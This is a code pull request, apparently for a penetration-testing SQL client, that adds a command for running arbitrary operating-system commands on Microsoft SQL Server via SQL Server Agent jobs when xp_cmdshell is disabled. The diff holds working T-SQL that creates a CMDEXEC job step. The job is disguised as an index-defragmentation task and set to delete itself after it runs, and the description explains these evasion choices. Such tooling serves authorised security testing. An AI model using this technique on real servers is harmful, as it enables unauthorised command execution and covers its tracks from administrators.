### PR TITLE
Alternative method to execute cmd's on MSSQL

### DIFF
--- a/examples/mssqlclient.py
+++ b/examples/mssqlclient.py
@@ -41,6 +41,7 @@ if __name__ == '__main__':
      enable_xp_cmdshell         - you know what it means
      disable_xp_cmdshell        - you know what it means
      xp_cmdshell {cmd}          - executes cmd using xp_cmdshell
+     sp_start_job {cmd}         - executes cmd using the sql server agent (blind)
      ! {cmd}                    - executes a local shell cmd
      """ 
 
@@ -52,6 +53,21 @@ if __name__ == '__main__':
                 self.sql.sql_query("exec master..xp_cmdshell '%s'" % s)
                 self.sql.printReplies()
                 self.sql.colMeta[0]['TypeData'] = 80*2
+                self.sql.printRows()
+            except:
+                pass
+
+        def sp_start_job(self, s):
+            try:
+                self.sql.sql_query("DECLARE @job NVARCHAR(100);"
+                                   "SET @job='IdxDefrag'+CONVERT(NVARCHAR(36),NEWID());"
+                                   "EXEC msdb..sp_add_job @job_name=@job,@description='INDEXDEFRAG',"
+                                   "@owner_login_name='sa',@delete_level=1;"
+                                   "EXEC msdb..sp_add_jobstep @job_name=@job,@step_id=1,@step_name='Defragmentation',"
+                                   "@subsystem='CMDEXEC',@command='%s',@on_success_action=1;"
+                                   "EXEC msdb..sp_add_jobserver @job_name=@job;"
+                                   "EXEC msdb..sp_start_job @job_name=@job;" % s)
+                self.sql.printReplies()
                 self.sql.printRows()
             except:
                 pass

--- a/examples/mssqlclient.py
+++ b/examples/mssqlclient.py
@@ -62,7 +62,7 @@ if __name__ == '__main__':
                 self.sql.sql_query("DECLARE @job NVARCHAR(100);"
                                    "SET @job='IdxDefrag'+CONVERT(NVARCHAR(36),NEWID());"
                                    "EXEC msdb..sp_add_job @job_name=@job,@description='INDEXDEFRAG',"
-                                   "@owner_login_name='sa',@delete_level=1;"
+                                   "@owner_login_name='sa',@delete_level=3;"
                                    "EXEC msdb..sp_add_jobstep @job_name=@job,@step_id=1,@step_name='Defragmentation',"
                                    "@subsystem='CMDEXEC',@command='%s',@on_success_action=1;"
                                    "EXEC msdb..sp_add_jobserver @job_name=@job;"


### PR DESCRIPTION
`sp_start_job {cmd}` will add an additional way to execute commands on the MS SQL Server, without using xp_cmdshell.

**Reason**
`xp_cmdshell` as well as `master.dbo.sp_configure` are often disabled, but the user might still be able to add jobs to the Server.

**Function**
A job is created using `sp_add_job` that auto-deletes itself after being run (`delete_level=3`). It is named as `IdxDefrag<GUID>`, as Index defragmentations are quite often run as jobs and to avoid collisions. Using `subsystem='CMDEXEC'` allows for arbitrary commands to be executed (This can be expanded to Powershell commands using `'PowerShell'` as well). The job is executed immediately.